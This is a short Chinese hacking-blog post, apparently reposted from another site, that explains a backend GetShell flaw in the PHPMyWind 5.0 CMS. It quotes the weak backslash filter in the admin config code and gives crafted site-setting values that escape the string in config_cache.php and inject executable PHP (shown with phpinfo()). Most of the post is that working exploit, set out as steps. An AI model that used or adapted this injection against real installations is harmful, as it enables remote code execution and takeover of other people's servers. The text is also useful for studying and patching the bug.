记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

phpmywind 5.0 后台GetShell漏洞利用

2014-08-16 14:05

admin/web_congif.php 的过滤代码如下。

//强制去掉 '
 
//强制去掉最后一位 /
 
$vartmp = str_replace("'",'',$row['varvalue']);
 
  
 
if(substr($vartmp, -1) == '\\')
 
{
 
$vartmp = substr($vartmp,1,-1);
 
}

只过滤了最后一位的反斜杠,只需要加两个反斜杠就可以了·····

首先修改网站配置信息

config_cache.php中会变成这样

$cfg_webname = '的网站\';
 
$cfg_weburl = ';/*http://127.0.0.1';
 
$cfg_webpath = '*/phpinfo();#';
 
$cfg_author = '';

php代码就会被执行了。

知识来源: www.hackqing.com/index.asp?FoxNews=1256.html

阅读:143573 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“phpmywind 5.0 后台GetShell漏洞利用”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云